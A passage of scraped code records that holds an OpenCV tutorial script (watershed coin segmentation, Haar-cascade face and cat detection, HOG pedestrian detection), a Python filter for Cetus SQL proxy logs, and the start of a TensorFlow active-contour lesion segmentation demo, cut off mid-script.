plt.imshow(coins), plt.axis(\"off\")\r\n\r\n#blurring\r\nblurredCoin = cv2.medianBlur(coins,13)\r\nplt.figure(), plt.imshow(blurredCoin), plt.axis(\"off\")\r\n\r\n#grayscale\r\n\r\ngrayCoin = cv2.cvtColor(blurredCoin, cv2.COLOR_BGR2GRAY)\r\nplt.figure(), plt.imshow(grayCoin, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#binary threshold \r\n\r\nret, coin_thresh = cv2.threshold(grayCoin, 75,255, cv2.THRESH_BINARY)\r\nplt.figure(), plt.imshow(coin_thresh, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# contour \r\n\r\ncontours, hier = cv2.findContours(coin_thresh.copy(), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\nfor i in range(len(contours)):\r\n\r\n if hier[0][i][3] == -1:\r\n cv2.drawContours(coins,contours,i,(0,255,0),10)\r\n\r\n\r\nplt.figure(), plt.imshow(coins, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#the upper method didn't work well thought all the coins as one entity\r\n\r\ncoins = cv2.imread(\"coins.jpg\")\r\nplt.figure(), plt.imshow(coins), plt.axis(\"off\")\r\n\r\n# lpf: blurring\r\ncoin_blur = cv2.medianBlur(coins, 13)\r\nplt.figure(), plt.imshow(coin_blur), plt.axis(\"off\")\r\n\r\n# grayscale\r\ncoin_gray = cv2.cvtColor(coin_blur, cv2.COLOR_BGR2GRAY)\r\nplt.figure(), plt.imshow(coin_gray, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# binary threshold\r\nret, coin_thresh = cv2.threshold(coin_gray, 65, 255, cv2.THRESH_BINARY)\r\nplt.figure(), plt.imshow(coin_thresh, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# opening\r\n\r\nkernel = np.ones((3,3), np.uint8)\r\nopening = cv2.morphologyEx(coin_thresh, cv2.MORPH_OPEN, kernel, iterations = 2)\r\nplt.figure(), plt.imshow(opening, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#distances between images \r\n\r\ndist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\r\nplt.figure(), plt.imshow(dist_transform, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#minimize image\r\n\r\nret, sure_foreground = cv2.threshold(dist_transform, 0.4*np.max(dist_transform), 255,0)\r\nplt.figure(), plt.imshow(sure_foreground, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#enlarge the image for the background\r\n\r\nsure_background = cv2.dilate(opening, kernel, iterations = 1)\r\nsure_foreground = np.uint8(sure_foreground)\r\nunknown = cv2.subtract(sure_background, sure_foreground )\r\nplt.figure(), plt.imshow(unknown, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#connection\r\n\r\nret, marker = cv2.connectedComponents(sure_foreground)\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nmarker = marker + 1\r\nmarker[unknown == 255] = 0\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#watershed\r\nmarker = cv2.watershed(coins,marker)\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# contour \r\n\r\ncontours, hier = cv2.findContours(marker.copy(), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\nfor i in range(len(contours)):\r\n\r\n if hier[0][i][3] == -1:\r\n cv2.drawContours(coins,contours,i,(255,0,0),10)\r\n\r\n\r\nplt.figure(), plt.imshow(coins), plt.axis(\"off\")\r\n\r\n\r\n#%% face recognition\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\neinstein = cv2.imread(\"einstein.jpg\", 0)\r\nplt.figure(), plt.imshow(einstein, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#classifier\r\nface_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\nface_rect = face_cascade.detectMultiScale(einstein)\r\n\r\nfor (x,y,w,h) in face_rect:\r\n cv2.rectangle(einstein, (x,y),(x+w, y+h),(255,255,255),10)\r\nplt.figure(), plt.imshow(einstein, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#barce\r\n\r\nbarce = cv2.imread(\"barcelona.jpg\", 0)\r\nplt.figure(), plt.imshow(barce, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\nface_rect = face_cascade.detectMultiScale(barce, minNeighbors= 7)\r\nfor (x,y,w,h) in face_rect:\r\n cv2.rectangle(barce, (x,y),(x+w, y+h),(255,255,255),10)\r\nplt.figure(), plt.imshow(barce, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n \r\n ret, frame = cap.read()\r\n \r\n if ret:\r\n \r\n face_rect = face_cascade.detectMultiScale(frame, minNeighbors = 7)\r\n \r\n for (x,y,w,h) in face_rect:\r\n cv2.rectangle(frame, (x,y),(x+w, y+h),(255,255,255),10)\r\n cv2.imshow(\"face detect\", frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n#%% cat face recognition\r\n\r\nimport cv2\r\nimport os \r\n\r\nfiles = os.listdir()\r\nprint(files)\r\n\r\nimg_list = []\r\nmin_size = (70,70) \r\nmax_size = (200, 200)\r\n\r\nfor f in files :\r\n if f.startswith(\"cat_img\"): \r\n img_list.append(f)\r\nprint(img_list)\r\n\r\nfor j in img_list:\r\n print(j)\r\n image = cv2.imread(j)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n detector = cv2.CascadeClassifier(\"haarcascade_frontalcatface.xml\")\r\n rects = detector.detectMultiScale(gray, scaleFactor = 1.030, minNeighbors = 2, minSize = min_size, maxSize = max_size)\r\n \r\n for(i,(x,y,w,h)) in enumerate(rects): \r\n \r\n cv2.rectangle(image, (x,y),(x+w, y+h),(0,255,255),2)\r\n cv2.putText(image, \"Kedi {}\".format(i+1), (x,y-10), cv2.FONT_HERSHEY_COMPLEX, 0.55, (0,255,255), 2)\r\n \r\n \r\n cv2.imshow(j, image)\r\n if cv2.waitKey(0) & 0xFF == ord(\"q\"): continue\r\n\r\ncv2.destroyAllWindows()\r\n\r\n#%% custom cascade\r\n\r\nimport cv2\r\nimport os\r\n\r\npath = \"images\"\r\n\r\nimgWidth = 180\r\nimgHeight = 120\r\n\r\n# video capture\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 480)\r\ncap.set(10, 180)\r\n\r\nglobal countFolder\r\ndef saveDataFunc():\r\n global countFolder\r\n countFolder = 0\r\n while os.path.exists(path + str(countFolder)):\r\n countFolder += 1\r\n os.makedirs(path+str(countFolder))\r\n\r\nsaveDataFunc()\r\n\r\ncount = 0\r\ncountSave = 0\r\n\r\nwhile True:\r\n \r\n success, img = cap.read()\r\n \r\n if success:\r\n \r\n img = cv2.resize(img, (imgWidth, imgHeight))\r\n \r\n if count % 5 == 0:\r\n cv2.imwrite(path+str(countFolder)+\"/\"+str(countSave)+\"_\"+\".png\",img)\r\n countSave += 1\r\n print(countSave)\r\n count += 1\r\n \r\n cv2.imshow(\"Image\",img)\r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n#%% Pedestrian detection\r\n\r\nfiles = os.listdir()\r\nimg_list = []\r\n\r\nfor f in files :\r\n if f.startswith(\"img\"):\r\n img_list.append(f)\r\n \r\nprint(img_list)\r\n\r\n# hog \r\nhog = cv2.HOGDescriptor()\r\n#svm \r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\nfor imagePath in img_list:\r\n image = cv2.imread(imagePath)\r\n \r\n (rects, weights) = hog.detectMultiScale(image, padding = (10,10), scale = 1.05)\r\n \r\n for (x,y,w,h) in rects:\r\n cv2.rectangle(image, (x,y), (x+w, y+h), (0,0,255), 2)\r\n \r\n cv2.imshow(\"Pedestrian: \", image)\r\n \r\n if cv2.waitKey(0) & 0xFF == ord(\"q\"): continue\r\n\r\n\r\ncv2.destroyAllWindows()\r\n\r\n#%% HA\r\n\r\n# opencv kütüphanesini içe aktaralım\r\n# ...\r\nimport cv2\r\n# numpy kütüphanesini içe aktaralım\r\n# ...\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n# resmi siyah beyaz olarak içe aktaralım resmi çizdirelim\r\n# ...\r\nimage = cv2.imread(\"odev2.jpg\", 0)\r\ncv2.imshow(\"Original\", image)\r\n# resim üzerinde bulunan kenarları tespit edelim ve görselleştirelim edge detection\r\n# ...\r\n\r\nmedImg = np.median(image)\r\nprint(medImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medImg))\r\nhigh = int(min(255, (1 + 0.33) * medImg))\r\nedges = cv2.Canny(image = image, threshold1 = low, threshold2 = high)\r\ncv2.imshow(\"Edges\", edges)\r\n\r\n# yüz tespiti için gerekli haar cascade'i içe aktaralım\r\n# ...\r\ndetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n# yüz tespiti yapıp sonuçları görselleştirelim\r\n# ...\r\nmin_size = (20,20) \r\nmax_size = (120,120)\r\nrects = detector.detectMultiScale(image, minNeighbors= 4, minSize = min_size, maxSize = max_size)\r\nfor (x,y,w,h) in rects:\r\n cv2.rectangle(image, (x,y), (x+w, y+h), (255,255,255), 5)\r\n \r\ncv2.imshow(\"Rectangles \", image)\r\nplt.figure(), plt.imshow(image, cmap=\"gray\"), plt.axis(\"off\")\r\n# HOG ilklendirelim insan tespiti algoritmamızı çağıralım ve svm'i set edelim\r\n# ...\r\nimage2 = image.copy()\r\nhog = cv2.HOGDescriptor() \r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\n# resme insan tespiti algoritmamızı uygulayalım ve görselleştirelim\r\n# ...\r\n\r\n(rects, weights) = hog.detectMultiScale(image, padding = (10,10), scale = 1.10)\r\n \r\nfor (x,y,w,h) in rects:\r\n cv2.rectangle(image2, (x,y), (x+w, y+h), (0,0,255), 2)\r\n \r\ncv2.imshow(\"HOG: \", image2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"candizd/ImageProcessing","sub_path":"Object_Detection/objectDetection.py","file_name":"objectDetection.py","file_ext":"py","file_size_in_byte":15477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36114219379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport getopt\nimport json\nimport os\nimport re\nimport time\n\n\"\"\"\n功能:\n 根据过滤条件,过滤Cetus全量日志\n输入:\n Cetus全量日志的路径\n 查询的开始时间\n 查询的结束时间\n 全量日志的过滤条件,JSON格式\n 输出文件的文件名,默认为sqllog.sql\n输出:\n 将过滤后的日志输出到指定文件中,默认为sqllog.sql\n\"\"\"\n\ndef usage():\n print('Usage:\\n'\n ' -h or --help: 显示帮助信息\\n'\n ' -p or --path: 日志文件路径\\n'\n ' -s or --start: 开始时间\\n'\n ' -e or --end: 结束时间\\n'\n ' -c or --cond: 过滤条件,JSON格式\\n'\n ' -o or --output: 输出文件名, 默认为sqllog.sql\\n'\n )\n\ndef filter_file(path, name, start_t):\n pathname = r'%s/%s'%(path, name)\n file_mt = os.stat(pathname).st_mtime\n if start_t == 0:\n return True\n if file_mt < start_t:\n return False\n return True\n\ndef filter_metadata(s):\n try:\n flag = re.search(r\"(#.*#)\", s).group(0)\n except AttributeError:\n flag = \"\"\n if flag.strip() == \"\":\n return False\n return True\n\ndef filter_str(s, d):\n for (k, v) in d.items():\n if k == \"sql\" or k == \"latency_start\" or k == \"latency_end\":\n continue\n cond = r\"%s:%s\"%(str(k), str(v))\n if s.find(cond) < 0:\n return False\n return True;\n\ndef filter_time(s, start_t, end_t):\n try:\n cur = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2}\\s\\d{1,2}:\\d{1,2}:\\d{1,2})\", s).group(0)\n except AttributeError:\n cur = \"\"\n if cur.strip() == \"\":\n cur_t = 0\n else:\n cur_t = time.mktime(time.strptime(cur, '%Y-%m-%d %H:%M:%S'))\n if start_t == 0 and end_t != 0:\n if cur_t <= end_t:\n return True\n elif start_t != 0 and end_t == 0:\n if cur_t >= start_t:\n return True\n elif start_t !=0 and end_t != 0:\n if cur_t >= start_t and cur_t <= end_t:\n return True\n else:\n return True\n return False\n\ndef filter_sql(s, f):\n if f.strip() == \"\":\n return True\n if s.upper().find(f.upper()) < 0:\n return False\n return True\n\ndef filter_latency(s, st, ed):\n if st == -1 or ed == -1:\n return True\n try:\n latency = re.search(r\"latency:([0-9]+.[0-9]+)\", s).group(0)\n except AttributeError:\n return False\n latency = latency.split(\":\")[1]\n if latency.strip() == \"\":\n return False\n if st <= float(latency) and ed >= float(latency):\n return True\n return False\n\nlog_path=\"\"\nlog_cond_json=\"\"\nlog_output=\"sqllog.sql\"\nlog_time_start=\"\"\nlog_time_end=\"\"\n\nlog_sql=\"\"\nlog_latency_st=-1\nlog_latency_ed=-1\n\ntry:\n options, args = getopt.getopt(sys.argv[1:], \"hp:c:o:s:e:\", [\"help\", \"path\", \"cond\", \"output\", \"start\", \"end\"])\nexcept getopt.GetoptError:\n sys.exit()\nfor name, value in options:\n if name in (\"-h\", \"--help\"):\n usage()\n if name in (\"-p\", \"--path\"):\n log_path = value\n if name in (\"-c\", \"--cond\"):\n log_cond_json = value\n if name in (\"-o\", \"--output\"):\n log_output = value\n if name in (\"-s\", \"--start\"):\n log_time_start = value\n if name in (\"-e\", \"--end\"):\n log_time_end = value\n\n# 处理输入参数\nif log_path.strip() == \"\":\n print(\"Error: path is NULL\")\n sys.exit()\n\nif log_time_start.strip() == \"\":\n start_t = 0\nelse:\n start_t = time.mktime(time.strptime(log_time_start, '%Y-%m-%d %H:%M:%S'))\nif log_time_end.strip() == \"\":\n end_t = 0\nelse:\n end_t = time.mktime(time.strptime(log_time_end, '%Y-%m-%d %H:%M:%S'))\n\n# 在路径下搜索待分析的日志文件\npath_file_list = os.listdir(log_path)\npath_file_list = sorted(path_file_list, key=lambda k: os.path.getmtime(os.path.join(log_path, k)))\nlog_file_list=[]\nfor f in path_file_list:\n # 按特定的后缀名过滤\n if f.endswith(\".clg\"):\n # 按文件的修改时间过滤\n if filter_file(log_path, f, start_t):\n log_file_list.append(f)\n else:\n # 由于已经按修改时间排序,因此一旦某一个文件不满足,后续文件定然不满足\n break\n\n# 获取过滤条件进行过滤\nlog_cond_json = log_cond_json.replace(\"'\", '\"')\nlog_cond_dict = json.loads(log_cond_json)\n\nfor (k, v) in log_cond_dict.items():\n if k == \"sql\":\n log_sql = v\n log_sql = re.sub(r' +', ' ', log_sql)\n if k == \"latency_start\":\n log_latency_st = float(v)\n if k == \"latency_end\":\n log_latency_ed = float(v)\n\nlog_output_file = r\"%s/%s\"%(log_path, log_output)\nwfp = open(log_output_file, \"w+\")\nfor f in log_file_list:\n st_md_start = 0\n st_sl_start = 0;\n rfp = open(f, \"r\")\n line_buffer = \"\"\n for line in rfp:\n line = line.strip()\n # 处理元数据行\n if filter_metadata(line):\n st_sl_start = 0\n if not line_buffer.strip() == \"\":\n line_buffer = re.sub(r' +', ' ', line_buffer)\n if filter_sql(line_buffer, log_sql):\n wfp.write(line_buffer + \"\\n\")\n line_buffer = \"\"\n # 按条件过滤\n if filter_str(line, log_cond_dict) and filter_time(line, start_t, end_t) and filter_latency(line, log_latency_st, log_latency_ed):\n line_buffer += line\n st_md_start = 1\n continue\n # 考虑有可能SQL有换行的情况,只过滤metadata\n if st_md_start == 1 or st_sl_start == 1:\n line_buffer += \" \"\n line_buffer += line\n st_md_start = 0\n st_sl_start = 1\n if not line_buffer.strip() == \"\":\n line_buffer = re.sub(r' +', ' ', line_buffer)\n if filter_sql(line_buffer, log_sql):\n wfp.write(line_buffer + \"\\n\")\n rfp.close()\nwfp.close()\n\n","repo_name":"tsthght/scripts","sub_path":"filter-log.py","file_name":"filter-log.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9191604390","text":"## Deep Active Lesion Segmention (DALS), Code by Ali Hatamizadeh ( http://web.cs.ucla.edu/~ahatamiz/ )\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import f1_score\nfrom utils import load_image,my_func,resolve_status,contoured_image\nimport matplotlib.pyplot as plt\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--logdir', default='network_lung', type=str)\nparser.add_argument('--mu', default=0.2, type=float)\nparser.add_argument('--nu', default=5.0, type=float)\nparser.add_argument('--batch_size', default=1, type=int)\nparser.add_argument('--train_sum_freq', default=150, type=int)\nparser.add_argument('--train_iter', default=150000, type=int)\nparser.add_argument('--acm_iter_limit', default=300, type=int)\nparser.add_argument('--img_resize', default=512, type=int)\nparser.add_argument('--f_size', default=15, type=int)\nparser.add_argument('--train_status', default=1, type=int)\nparser.add_argument('--narrow_band_width', default=1, type=int)\nparser.add_argument('--save_freq', default=1000, type=int)\nparser.add_argument('--lr', default=1e-3, type=float)\nparser.add_argument('--gpu', default='0', type=str)\nargs = parser.parse_args()\nrestore,is_training =resolve_status(args.train_status)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\n\n\n###### Demo 1 # Brain\nimage_add = './dataset/demo_brain/img1_input.npy'\nlabel_add = './dataset/demo_brain/img1_label.npy'\ninit_seg_add = './dataset/demo_brain/img1_initseg.npy'\n\n\ndef re_init_phi(phi, dt):\n D_left_shift = tf.cast(tf.manip.roll(phi, -1, axis=1), dtype='float32')\n D_right_shift = tf.cast(tf.manip.roll(phi, 1, axis=1), dtype='float32')\n D_up_shift = tf.cast(tf.manip.roll(phi, -1, axis=0), dtype='float32')\n D_down_shift = tf.cast(tf.manip.roll(phi, 1, axis=0), dtype='float32')\n bp = D_left_shift - phi\n cp = phi - D_down_shift\n dp = D_up_shift - phi\n ap = phi - D_right_shift\n an = tf.identity(ap)\n bn = tf.identity(bp)\n cn = tf.identity(cp)\n dn = tf.identity(dp)\n ap = tf.clip_by_value(ap, 0, 10 ^ 38)\n bp = tf.clip_by_value(bp, 0, 10 ^ 38)\n cp = tf.clip_by_value(cp, 0, 10 ^ 38)\n dp = tf.clip_by_value(dp, 0, 10 ^ 38)\n an = tf.clip_by_value(an, -10 ^ 38, 0)\n bn = tf.clip_by_value(bn, -10 ^ 38, 0)\n cn = tf.clip_by_value(cn, -10 ^ 38, 0)\n dn = tf.clip_by_value(dn, -10 ^ 38, 0)\n area_pos = tf.where(phi > 0)\n area_neg = tf.where(phi < 0)\n pos_y = area_pos[:, 0]\n pos_x = area_pos[:, 1]\n neg_y = area_neg[:, 0]\n neg_x = area_neg[:, 1]\n tmp1 = tf.reduce_max([tf.square(tf.gather_nd(t, area_pos)) for t in [ap, bn]], axis=0)\n tmp1 += tf.reduce_max([tf.square(tf.gather_nd(t, area_pos)) for t in [cp, dn]], axis=0)\n update1 = tf.sqrt(tf.abs(tmp1)) - 1\n indices1 = tf.stack([pos_y, pos_x], 1)\n tmp2 = tf.reduce_max([tf.square(tf.gather_nd(t, area_neg)) for t in [an, bp]], axis=0)\n tmp2 += tf.reduce_max([tf.square(tf.gather_nd(t, area_neg)) for t in [cn, dp]], axis=0)\n update2 = tf.sqrt(tf.abs(tmp2)) - 1\n indices2 = tf.stack([neg_y, neg_x], 1)\n indices_final = tf.concat([indices1, indices2], 0)\n update_final = tf.concat([update1, update2], 0)\n dD = tf.scatter_nd(indices_final, update_final, shape=[input_image_size, input_image_size])\n S = tf.divide(phi, tf.square(phi) + 1)\n phi = phi - tf.multiply(dt * S, dD)\n\n return phi\n\n\ndef get_curvature(phi, x, y):\n phi_shape = tf.shape(phi)\n dim_y = phi_shape[0]\n dim_x = phi_shape[1]\n x = tf.cast(x, dtype=\"int32\")\n y = tf.cast(y, dtype=\"int32\")\n y_plus = tf.cast(y + 1, dtype=\"int32\")\n y_minus = tf.cast(y - 1, dtype=\"int32\")\n x_plus = tf.cast(x + 1, dtype=\"int32\")\n x_minus = tf.cast(x - 1, dtype=\"int32\")\n y_plus = tf.minimum(tf.cast(y_plus, dtype=\"int32\"), tf.cast(dim_y - 1, dtype=\"int32\"))\n x_plus = tf.minimum(tf.cast(x_plus, dtype=\"int32\"), tf.cast(dim_x - 1, dtype=\"int32\"))\n y_minus = tf.maximum(y_minus, 0)\n x_minus = tf.maximum(x_minus, 0)\n d_phi_dx = tf.gather_nd(phi, tf.stack([y, x_plus], 1)) - tf.gather_nd(phi, tf.stack([y, x_minus], 1))\n d_phi_dx_2 = tf.square(d_phi_dx)\n d_phi_dy = tf.gather_nd(phi, tf.stack([y_plus, x], 1)) - tf.gather_nd(phi, tf.stack([y_minus, x], 1))\n d_phi_dy_2 = tf.square(d_phi_dy)\n d_phi_dxx = tf.gather_nd(phi, tf.stack([y, x_plus], 1)) + tf.gather_nd(phi, tf.stack([y, x_minus], 1)) - \\\n 2 * tf.gather_nd(phi, tf.stack([y, x], 1))\n d_phi_dyy = tf.gather_nd(phi, tf.stack([y_plus, x], 1)) + tf.gather_nd(phi, tf.stack([y_minus, x], 1)) - \\\n 2 * tf.gather_nd(phi, tf.stack([y, x], 1))\n d_phi_dxy = 0.25 * (- tf.gather_nd(phi, tf.stack([y_minus, x_minus], 1)) - tf.gather_nd(phi, tf.stack(\n [y_plus, x_plus], 1)) + tf.gather_nd(phi, tf.stack([y_minus, x_plus], 1)) + tf.gather_nd(phi, tf.stack(\n [y_plus, x_minus], 1)))\n tmp_1 = tf.multiply(d_phi_dx_2, d_phi_dyy) + tf.multiply(d_phi_dy_2, d_phi_dxx) - \\\n 2 * tf.multiply(tf.multiply(d_phi_dx, d_phi_dy), d_phi_dxy)\n tmp_2 = tf.add(tf.pow(d_phi_dx_2 + d_phi_dy_2, 1.5), 2.220446049250313e-16)\n tmp_3 = tf.pow(d_phi_dx_2 + d_phi_dy_2, 0.5)\n tmp_4 = tf.divide(tmp_1, tmp_2)\n curvature = tf.multiply(tmp_3, tmp_4)\n mean_grad = tf.pow(d_phi_dx_2 + d_phi_dy_2, 0.5)\n\n return curvature, mean_grad\n\n\ndef get_intensity(image, masked_phi, filter_patch_size=5):\n u_1 = tf.layers.average_pooling2d(tf.multiply(image, masked_phi), [filter_patch_size, filter_patch_size], 1,padding='SAME')\n u_2 = tf.layers.average_pooling2d(masked_phi, [filter_patch_size, filter_patch_size], 1, padding='SAME')\n u_2_prime = 1 - tf.cast((u_2 > 0), dtype='float32') + tf.cast((u_2 < 0), dtype='float32')\n u_2 = u_2 + u_2_prime + 2.220446049250313e-16\n\n return tf.divide(u_1, u_2)\n\n\ndef active_contour_layer(elems):\n img = elems[0]\n init_phi = elems[1]\n map_lambda1_acl = elems[2]\n map_lambda2_acl = elems[3]\n wind_coef = 3\n zero_tensor = tf.constant(0, shape=[], dtype=\"int32\")\n def _body(i, phi_level):\n band_index = tf.reduce_all([phi_level <= narrow_band_width, phi_level >= -narrow_band_width], axis=0)\n band = tf.where(band_index)\n band_y = band[:, 0]\n band_x = band[:, 1]\n shape_y = tf.shape(band_y)\n num_band_pixel = shape_y[0]\n window_radii_x = tf.ones(num_band_pixel) * wind_coef\n window_radii_y = tf.ones(num_band_pixel) * wind_coef\n\n def body_intensity(j, mean_intensities_outer, mean_intensities_inner):\n ### This can be computationally expensive. Use with fewer number of acm iterations.\n xnew = tf.cast(band_x[j], dtype=\"float32\")\n ynew = tf.cast(band_y[j], dtype=\"float32\")\n window_radius_x = tf.cast(window_radii_x[j], dtype=\"float32\")\n window_radius_y = tf.cast(window_radii_y[j], dtype=\"float32\")\n local_window_x_min = tf.cast(tf.floor(xnew - window_radius_x), dtype=\"int32\")\n local_window_x_max = tf.cast(tf.floor(xnew + window_radius_x), dtype=\"int32\")\n local_window_y_min = tf.cast(tf.floor(ynew - window_radius_y), dtype=\"int32\")\n local_window_y_max = tf.cast(tf.floor(ynew + window_radius_y), dtype=\"int32\")\n local_window_x_min = tf.maximum(zero_tensor, local_window_x_min)\n local_window_y_min = tf.maximum(zero_tensor, local_window_y_min)\n local_window_x_max = tf.minimum(tf.cast(input_image_size - 1, dtype=\"int32\"), local_window_x_max)\n local_window_y_max = tf.minimum(tf.cast(input_image_size - 1, dtype=\"int32\"), local_window_y_max)\n local_image = img[local_window_y_min: local_window_y_max + 1,local_window_x_min: local_window_x_max + 1]\n local_phi = phi_prime[local_window_y_min: local_window_y_max + 1,local_window_x_min: local_window_x_max + 1]\n inner = tf.where(local_phi <= 0)\n area_inner = tf.cast(tf.shape(inner)[0], dtype='float32')\n outer = tf.where(local_phi > 0)\n area_outer = tf.cast(tf.shape(outer)[0], dtype='float32')\n image_loc_inner = tf.gather_nd(local_image, inner)\n image_loc_outer = tf.gather_nd(local_image, outer)\n mean_intensity_inner = tf.cast(tf.divide(tf.reduce_sum(image_loc_inner), area_inner), dtype='float32')\n mean_intensity_outer = tf.cast(tf.divide(tf.reduce_sum(image_loc_outer), area_outer), dtype='float32')\n mean_intensities_inner = tf.concat(axis=0, values=[mean_intensities_inner[:j], [mean_intensity_inner]])\n mean_intensities_outer = tf.concat(axis=0, values=[mean_intensities_outer[:j], [mean_intensity_outer]])\n\n return (j + 1, mean_intensities_outer, mean_intensities_inner)\n\n if fast_lookup:\n phi_4d = phi_level[tf.newaxis, :, :, tf.newaxis]\n image = img[tf.newaxis, :, :, tf.newaxis]\n band_index_2 = tf.reduce_all([phi_4d <= narrow_band_width, phi_4d >= -narrow_band_width], axis=0)\n band_2 = tf.where(band_index_2)\n u_inner = get_intensity(image, tf.cast((([phi_4d <= 0])), dtype='float32')[0], filter_patch_size=f_size)\n u_outer = get_intensity(image, tf.cast((([phi_4d > 0])), dtype='float32')[0], filter_patch_size=f_size)\n mean_intensities_inner = tf.gather_nd(u_inner, band_2)\n mean_intensities_outer = tf.gather_nd(u_outer, band_2)\n\n else:\n mean_intensities_inner = tf.constant([0], dtype='float32')\n mean_intensities_outer = tf.constant([0], dtype='float32')\n j = tf.constant(0, dtype=tf.int32)\n _, mean_intensities_outer, mean_intensities_inner = tf.while_loop(\n lambda j, mean_intensities_outer, mean_intensities_inner:\n j < num_band_pixel, body_intensity, loop_vars=[j, mean_intensities_outer, mean_intensities_inner],\n shape_invariants=[j.get_shape(), tf.TensorShape([None]), tf.TensorShape([None])])\n\n lambda1 = tf.gather_nd(map_lambda1_acl, [band])\n lambda2 = tf.gather_nd(map_lambda2_acl, [band])\n curvature, mean_grad = get_curvature(phi_level, band_x, band_y)\n kappa = tf.multiply(curvature, mean_grad)\n term1 = tf.multiply(tf.cast(lambda1, dtype='float32'),tf.square(tf.gather_nd(img, [band]) - mean_intensities_inner))\n term2 = tf.multiply(tf.cast(lambda2, dtype='float32'),tf.square(tf.gather_nd(img, [band]) - mean_intensities_outer))\n force = -nu + term1 - term2\n force /= (tf.reduce_max(tf.abs(force)))\n d_phi_dt = tf.cast(force, dtype=\"float32\") + tf.cast(mu * kappa, dtype=\"float32\")\n dt = .45 / (tf.reduce_max(tf.abs(d_phi_dt)) + 2.220446049250313e-16)\n d_phi = dt * d_phi_dt\n update_narrow_band = d_phi\n phi_prime = phi_level + tf.scatter_nd([band], tf.cast(update_narrow_band, dtype='float32'),shape=[input_image_size, input_image_size])\n phi_prime = re_init_phi(phi_prime, 0.5)\n\n return (i + 1, phi_prime)\n\n i = tf.constant(0, dtype=tf.int32)\n phi = init_phi\n _, phi = tf.while_loop(lambda i, phi: i < iter_limit, _body, loop_vars=[i, phi])\n phi = tf.round(tf.cast((1 - tf.nn.sigmoid(phi)), dtype=tf.float32))\n\n return phi,init_phi, map_lambda1_acl, map_lambda2_acl\n\nfast_lookup = True\nconfig = tf.ConfigProto(allow_soft_placement=True)\ninput_shape = [args.batch_size, args.img_resize, args.img_resize, 1]\ninput_shape_dt = [args.batch_size, args.img_resize, args.img_resize]\niter_limit = args.acm_iter_limit\nnarrow_band_width = args.narrow_band_width\nmu = args.mu\nnu = args.nu\nf_size = args.f_size\ninput_image_size = args.img_resize\nx = tf.placeholder(shape=input_shape, dtype=tf.float32, name=\"x\")\ny = tf.placeholder(dtype=tf.float32, name=\"y\")\nout_seg = tf.placeholder(dtype=tf.float32, name=\"out_seg\")\nphase = tf.placeholder(tf.bool, name='phase')\nglobal_step = tf.Variable(0, name='global_step', trainable=False)\nmap_lambda1 = tf.exp(tf.divide(tf.subtract(2.0,out_seg),tf.add(1.0,out_seg)))\nmap_lambda2 = tf.exp(tf.divide(tf.add(1.0, out_seg), tf.subtract(2.0, out_seg)))\ny_out_dl = tf.round(out_seg)\nx_acm = x[:, :, :, 0]\nrounded_seg_acl = y_out_dl[:, :, :, 0]\ndt_trans = tf.py_func(my_func, [rounded_seg_acl], tf.float32)\ndt_trans.set_shape([args.batch_size, input_image_size, input_image_size])\nphi_out,_, lambda1_tr, lambda2_tr = tf.map_fn(fn=active_contour_layer, elems=(x_acm, dt_trans, map_lambda1[:, :, :, 0], map_lambda2[:, :, :, 0]))\nrounded_seg = tf.round(out_seg)\nwith tf.Session(config=config) as sess:\n\n print(\"########### Inference 